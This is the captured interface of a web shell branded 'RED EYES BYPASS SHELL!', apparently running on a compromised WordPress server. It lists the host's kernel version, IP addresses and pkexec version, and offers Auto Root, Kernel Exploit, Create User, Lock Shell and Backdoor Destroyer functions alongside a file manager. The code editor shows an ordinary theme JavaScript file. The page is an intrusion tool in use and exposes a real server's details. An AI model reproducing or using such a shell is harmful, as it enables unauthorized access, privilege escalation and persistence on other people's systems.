Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
twentynineteen /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
customize-controls.js
922
B
-rwxr-xr-x
customize-preview.js
1.64
KB
-rwxr-xr-x
priority-menu.js
5.25
KB
-rwxr-xr-x
skip-link-focus-fix.js
794
B
-rwxr-xr-x
touch-keyboard-navigation.js
9.36
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customize-controls.js
/** * File customize-controls.js. * * Theme Customizer enhancements for a better user experience. * * Contains handlers to make Theme Customizer preview reload changes asynchronously. */ (function() { wp.customize.bind( 'ready', function() { // Only show the color hue control when there's a custom primary color. wp.customize( 'primary_color', function( setting ) { wp.customize.control( 'primary_color_hue', function( control ) { var visibility = function() { if ( 'custom' === setting.get() ) { control.container.slideDown( 180 ); } else { control.container.slideUp( 180 ); } }; // The control-specific label is redundant because, visually, this control is part of the Color Scheme control. control.container.find( '.customize-control-title:first' ).addClass( 'screen-reader-text' ); visibility(); setting.bind( visibility ); }); }); }); })();
Close